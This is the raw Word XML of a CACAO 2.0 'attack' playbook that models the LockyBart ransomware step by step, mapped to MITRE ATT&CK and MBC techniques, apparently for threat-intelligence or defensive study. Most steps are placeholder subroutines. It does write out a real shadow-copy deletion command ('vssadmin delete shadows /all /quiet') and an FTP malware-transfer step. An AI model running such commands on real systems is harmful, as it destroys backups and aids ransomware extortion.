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BCF8" w14:textId="77777777" w:rsidR="00346C3A" w:rsidRPr="00346C3A" w:rsidRDefault="00346C3A" w:rsidP="00346C3A">
      <w:pPr>
        <w:spacing w:before="400" w:after="120"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00346C3A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Attack Playbook 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4097CB1B" w14:textId="62642BB9" w:rsidR="004A0A13" w:rsidRDefault="004A0A13"/>
    <w:p w14:paraId="71DE59F6" w14:textId="77777777" w:rsidR="004A0A13" w:rsidRPr="00666084" w:rsidRDefault="004A0A13"/>
    <w:p w14:paraId="15F0C8FF" w14:textId="587CFD40" w:rsidR="004A0A13" w:rsidRPr="00666084" w:rsidRDefault="004A0A13">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pP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[{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"type": "playbook",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spec_version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"cacao-2.0",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"id": "playbook--fefb9f12-d308-461c-8aa7-a5d6279ab468",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"name":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LockyBart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 xml:space="preserve"> ransomware",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"description": "This playbook captures the sequence of steps of how encrypts files to obtain a ransom using the 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LockyBart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 xml:space="preserve"> ransomware.",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playbook_types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["attack"],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playbook_activities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["step-sequence"],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created_by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"identity--c59f3ff7-2f24-5bd4-a0ed-2fd36ec04b06",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"created": "2023-05-01T12:08:00.000Z",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"modified": "2023-05-01T12:08:00.000Z",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"labels": [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ransonware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LockyBart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],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external_references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[{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"name": "Locky Bart ransomware and backend server analysis",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url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"https://www.malwarebytes.com/blog/news/2017/01/locky-bart-ransomware-and-backend-server-analysis"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}],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workflow_start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"start--507aadb2-9f8f-4937-8643-5f50cd358906",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"workflow": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E16791C" w14:textId="0B882F35" w:rsidR="004A0A13" w:rsidRPr="00666084" w:rsidRDefault="005508D7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00666084">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>------------------------------------0---------------------------------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"start--507aadb2-9f8f-4937-8643-5f50cd358906":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"start",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"Start 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LockyBart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 xml:space="preserve"> ransomware attack",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on_completion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"action--cdc2f237-8823-413b-8beb-84a612be0ae8"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</w:p>
    <w:p w14:paraId="0BC49C02" w14:textId="5AD985AE" w:rsidR="004A0A13" w:rsidRPr="00666084" w:rsidRDefault="005508D7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00666084">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>------------------------------------1---------------------------------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"action--cdc2f237-8823-413b-8beb-84a612be0ae8":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"action",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"Use a software protection technique",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"Code virtualization is added to the Locky Bart binary using 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WPProtect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00247DC5" w:rsidRPr="00666084">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t>.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external_references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"name": "Anti-Static Analysis::Executable Code Virtualization",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"source": </w:t>
      </w:r>
      <w:r w:rsidR="00E33815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proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E33815">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t>mbc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E33815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r w:rsidR="00E33815">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t>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"B0008",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reference_id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"malware-behavior--2cfd6d52-467d-4d05-9091-b31916218bc2"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"commands":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"type": "bash",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"command":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WPProtect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playbook_activity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"step-sequence"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"agent": "group--a757ce82-b838-4c68-9e41-74b0e94211a5",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lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "targets": ["software--5e1cadae-7532-45d8-89f8-fe051a1e7df8"],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on_completion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"action--3fdb51db-2548-4beb-ab7d-f52b3ab1e5ed"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</w:p>
    <w:p w14:paraId="449676B2" w14:textId="11ECFCEF" w:rsidR="004A0A13" w:rsidRPr="00666084" w:rsidRDefault="0034797E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00666084">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>------------------------------------2---------------------------------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"action--3fdb51db-2548-4beb-ab7d-f52b3ab1e5ed":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"action",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 Install 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LockyBart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 xml:space="preserve"> on victim's endpoint",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"ftp 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LockyBart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 xml:space="preserve"> to victim",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external_references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"name": "Command and Control::Ingress Tool Transfer",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"source":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mitre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-attack",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"T1105",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reference_id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"attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add"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"commands":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"type": "ftp",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"command": "ftp malware.victim.com lockybart.exe",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playbook_activity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"step-sequence"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"agent": "group--a757ce82-b838-4c68-9e41-74b0e94211a5",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"targets": ["security-category--324ccb41-3306-4876-b017-1e07a81e16de"],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on_completion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"action--7953f6e2-5f09-4fe3-8ffd-476ec5dabe3c"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</w:p>
    <w:p w14:paraId="0ACDC38C" w14:textId="2BB1A79F" w:rsidR="004A0A13" w:rsidRPr="00666084" w:rsidRDefault="0034797E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00666084">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>------------------------------------3---------------------------------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"action--7953f6e2-5f09-4fe3-8ffd-476ec5dabe3c":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"action",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"Wipe System Restore Points with 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VSSadmin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"The ransomware deletes any backed-up files",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external_references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"name": "Impact:: Inhibit System Recovery",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"source":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mitre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-attack",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"T1490",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reference_id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"attack-pattern--f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a"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"commands":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"type": "bash",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"command": "vssadmin.exe delete shadows /all /quiet",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playbook_activity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"step-sequence"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"agent": "software--5e1cadae-7532-45d8-89f8-fe051a1e7df8",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on_completion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"action</w:t>
      </w:r>
      <w:r w:rsidR="004F2E5B" w:rsidRPr="00666084">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t>--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d31e28d1-3584-4f59-a139-6764c6509c6e"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</w:p>
    <w:p w14:paraId="0FD0E67D" w14:textId="6A118737" w:rsidR="004A0A13" w:rsidRPr="00666084" w:rsidRDefault="0034797E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00666084">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>------------------------------------4---------------------------------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"action--d31e28d1-3584-4f59-a139-6764c6509c6e":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"action",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"Generate a seed to create a key to encrypt user</w:t>
      </w:r>
      <w:r w:rsidR="004C5DF5" w:rsidRPr="00666084">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t>’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s files.",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"Execute the function used to generate a seed, which is used to create a key to encrypt the files with. It uses variables like system time, process ID, thread ID, Process Alive Time, and CPU ticks to generate a random number",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external_references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"name": "Cryptography::Generate Pseudo-random Sequence::Use",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lastRenderedPageBreak/>
        <w:t xml:space="preserve">                "source":</w:t>
      </w:r>
      <w:r w:rsidR="00666084" w:rsidRPr="00666084">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E33815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proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E33815">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mbc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E33815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r w:rsidR="00E33815">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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"C0021.003",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reference_id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"malware-method--82332a69-b4e9-4ce1-a3df-8d846a5b568e"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"commands":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"type": "subroutine",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"command":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GenerateSeed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()",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playbook_activity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"step-sequence"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"agent": "software--5e1cadae-7532-45d8-89f8-fe051a1e7df8",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on_completion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"action--191bce6e-2fea-4a7e-b4a5-c0d96f129a8d"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</w:p>
    <w:p w14:paraId="1BDB6F0D" w14:textId="14D9911C" w:rsidR="0034797E" w:rsidRPr="00666084" w:rsidRDefault="004A0A13">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00666084">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>------------------------------------5---------------------------------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"action--191bce6e-2fea-4a7e-b4a5-c0d96f129a8d": {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"action",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"Enumerate the files it wants to encrypt, skipping certain folders to speed it up",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"Scan filesystem for user files",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external_references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[{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"name": "Discovery::File and Directory Discovery",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"source":</w:t>
      </w:r>
      <w:r w:rsidR="00666084" w:rsidRPr="00666084">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E33815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proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E33815">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mbc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E33815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r w:rsidR="00E33815">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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external_id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"E1083",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reference_id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"malware-behavior--bd42af9f-9cb2-43c2-948d-da271591f890"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"commands": [{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"type": "subroutine",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"command": "Enumerate()",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playbook_activity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"step-sequence"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"agent": "software--5e1cadae-7532-45d8-89f8-fe051a1e7df8",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"targets": ["security-category--acc1cff5-af87-4caa-8529-84b08c187653"],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on_completion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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t>": "action--edd41723-869d-5a07-9971-55876c706533"</w:t>
      </w:r>
      <w:r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</w:p>
    <w:p w14:paraId="71B11747" w14:textId="2ACFBB86" w:rsidR="0034797E" w:rsidRPr="00666084" w:rsidRDefault="0034797E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00666084">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>------------------------------------6---------------------------------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"action--edd41723-869d-5a07-9971-55876c706533":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"action",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"Generate Key using data on victim's endpoint",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"Locky Bart gathers information on the victim</w:t>
      </w:r>
      <w:r w:rsidR="00253E52" w:rsidRPr="00666084">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t>’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s machine to create an encryption key.",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external_references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[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    "name": "Discovery::Process Discovery",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    "source":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mitre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-attack",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url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"https://attack.mitre.org/techniques/T1057/",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"T1057",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reference_id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"attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580"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},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    "name": "Cryptography::Encryption Key",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    "source": </w:t>
      </w:r>
      <w:r w:rsidR="00E33815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proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E33815">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t>mbc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00666084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r w:rsidR="00666084">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00666084" w:rsidRPr="00666084">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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"C0028",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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    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reference_id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"malware-behavior--99267783-7a99-4ab7-881f-0dbf52c5bfba"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}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"commands":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"type": "subroutine",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"command": "Run function to perform action",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playbook_activity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"step-sequence"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"agent": "software--5e1cadae-7532-45d8-89f8-fe051a1e7df8",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"targets": ["security-category--324ccb41-3306-4876-b017-1e07a81e16de "],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on_completion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"action--3f0dc5a7-ffd8-57e1-8b0b-2181638f5c95"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</w:p>
    <w:p w14:paraId="2F8FD602" w14:textId="00E59B4B" w:rsidR="0034797E" w:rsidRPr="00666084" w:rsidRDefault="0034797E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00666084">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-----------------------------------6b---------------------------------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"action--3f0dc5a7-ffd8-57e1-8b0b-2181638f5c95":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"action",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"Encrypt Files",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"Encrypt files gathered during a previous step with the key generated in the previous step",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external_references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"name": " Impact::Data Encrypted for Impact",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"source": </w:t>
      </w:r>
      <w:r w:rsidR="00E33815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proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E33815">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t>mbc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E33815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r w:rsidR="00E33815">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t>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"E1486",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reference_id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"malware-behavior--d2b9f551-8477-424b-8042-9c4289cb3cfe"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"commands":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"type": "subroutine",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"command": "Run function to perform action",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playbook_activity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"step-sequence"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"agent": "software--5e1cadae-7532-45d8-89f8-fe051a1e7df8",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"targets": ["security-category--191bce6e-2fea-4a7e-b4a5-c0d96f129a8d "],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on_completion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"action--a7fca25a-2ee2-59c0-8df6-9f6ade83e286"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</w:p>
    <w:p w14:paraId="00E951D8" w14:textId="602D0E51" w:rsidR="0034797E" w:rsidRPr="00666084" w:rsidRDefault="0034797E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00666084">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>------------------------------------7---------------------------------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"action--a7fca25a-2ee2-59c0-8df6-9f6ade83e286":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"action",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"Encrypt key",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"Encrypt the key used to encrypt the files with a master key, which now becomes the victim\u2019s UID used to identify them",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external_references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"name": "Cryptography::Encrypt Data::RC4 (C0027.009)",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"source": </w:t>
      </w:r>
      <w:r w:rsidR="00E33815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proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E33815">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t>mbc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E33815" w:rsidRPr="00666084">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="00E33815">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t>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external_id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"C0027.009",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reference_id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"malware-method--77c46dd0-28a7-4b9b-9c62-849e91f6306a"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"commands":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"type": "subroutine",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"command": "Encrypt key using a public key and RC4 PRGA",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playbook_activity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"step-sequence"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"agent": "software--5e1cadae-7532-45d8-89f8-fe051a1e7df8",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lastRenderedPageBreak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on_completion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"action--e742fc09-743d-4174-9edb-1b4bcccd03bb"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</w:p>
    <w:p w14:paraId="559C87B9" w14:textId="1B9BCB53" w:rsidR="004A0A13" w:rsidRPr="00666084" w:rsidRDefault="0034797E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00666084">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>------------------------------------8---------------------------------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"action--e742fc09-743d-4174-9edb-1b4bcccd03bb":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"action",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"Create and display ransom note",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"Locky Bart then generates a URL on the victim\u2019s machine. It contains the link to a TOR </w:t>
      </w:r>
      <w:proofErr w:type="gram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cloaked .onion</w:t>
      </w:r>
      <w:proofErr w:type="gram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 xml:space="preserve"> address where the malicious backend website is hosted. This URL has a user ID within it. This UID is the original decryption key, in encrypted form. Display the ransom note on the desktop with the URL to a payment page.",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"commands": [{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"type": "subroutine",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"command": "Create note with URL that contains the encrypted decryption key",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playbook_activity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"step-sequence"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}],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"agent": "software--5e1cadae-7532-45d8-89f8-fe051a1e7df8",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on_completion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": " end--0176c66e-9dad-4008-8b4c-bc2d52264557"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"end--0176c66e-9dad-4008-8b4c-bc2d52264557":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"end",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"Ransomware attack initiated"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},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"agents":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"software--5e1cadae-7532-45d8-89f8-fe051a1e7df8":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"software",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LockyBart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"ransomware"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"group--a757ce82-b838-4c68-9e41-74b0e94211a5":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"group",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"Adversary Group",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"The threat actor group that runs the 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LockyBart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 xml:space="preserve"> malicious website"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},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"targets":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"software--5e1cadae-7532-45d8-89f8-fe051a1e7df8":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"software",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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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LockyBart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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t>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"ransomware"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"security-category--191bce6e-2fea-4a7e-b4a5-c0d96f129a8d":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"security-category",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"category": ["filesystem"],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"Files on endpoint",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"description": "File system on the victim's endpoint for which to select files that will be encrypted."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"security-category--324ccb41-3306-4876-b017-1e07a81e16de": {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"type": "security-category",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"category": ["endpoint"],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    "name": "Endpoint with ransomware",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lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "description": "Endpoint where the ransomware attack takes place"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    }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 xml:space="preserve">    }</w:t>
      </w:r>
      <w:r w:rsidR="004A0A13" w:rsidRPr="00666084">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:br/>
        <w:t>}]</w:t>
      </w:r>
      <w:r w:rsidR="004A0A13" w:rsidRPr="00666084">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="004A0A13" w:rsidRPr="00666084" w:rsidSect="0052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E9E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B32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97BFE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3ADA1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24E69"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A75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225951">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="33240033">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="89119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3A"/>
    <w:rsid w:val="00014216"/>
    <w:rsid w:val="000651C6"/>
    <w:rsid w:val="000A2A94"/>
    <w:rsid w:val="000F0A21"/>
    <w:rsid w:val="00145DD0"/>
    <w:rsid w:val="0019079F"/>
    <w:rsid w:val="001B354A"/>
    <w:rsid w:val="001E1803"/>
    <w:rsid w:val="001E6D32"/>
    <w:rsid w:val="00207533"/>
    <w:rsid w:val="00247DC5"/>
    <w:rsid w:val="00253E52"/>
    <w:rsid w:val="00332E47"/>
    <w:rsid w:val="00346C3A"/>
    <w:rsid w:val="0034797E"/>
    <w:rsid w:val="003B0EA4"/>
    <w:rsid w:val="004A0A13"/>
    <w:rsid w:val="004C5DF5"/>
    <w:rsid w:val="004E1CC5"/>
    <w:rsid w:val="004E4DD1"/>
    <w:rsid w:val="004F2063"/>
    <w:rsid w:val="004F2E5B"/>
    <w:rsid w:val="00527DCE"/>
    <w:rsid w:val="005321D8"/>
    <w:rsid w:val="005508D7"/>
    <w:rsid w:val="00666084"/>
    <w:rsid w:val="007B202E"/>
    <w:rsid w:val="007C57A2"/>
    <w:rsid w:val="008B510B"/>
    <w:rsid w:val="00941B9C"/>
    <w:rsid w:val="009C2BD8"/>
    <w:rsid w:val="009F5D17"/>
    <w:rsid w:val="00A446E4"/>
    <w:rsid w:val="00A6439A"/>
    <w:rsid w:val="00B87EF9"/>
    <w:rsid w:val="00BC73FE"/>
    <w:rsid w:val="00BD0A41"/>
    <w:rsid w:val="00BD5F19"/>
    <w:rsid w:val="00D9478D"/>
    <w:rsid w:val="00E33815"/>
    <w:rsid w:val="00E67310"/>
    <w:rsid w:val="00F44ABB"/>
    <w:rsid w:val="00F64B42"/>
    <w:rsid w:val="00F65B00"/>
    <w:rsid w:val="00FB14A9"/>
    <w:rsid w:val="00FB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DB30"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{64F9496B-0F66-0946-A0E5-E5FF3CF3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D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46C3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346C3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46C3A"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004F2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5D1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0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0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0A1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A1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247DC5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Piazza</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Rich Piazza</cp:lastModifiedBy>
  <cp:revision>13</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-05-22T14:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-06-13T20:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>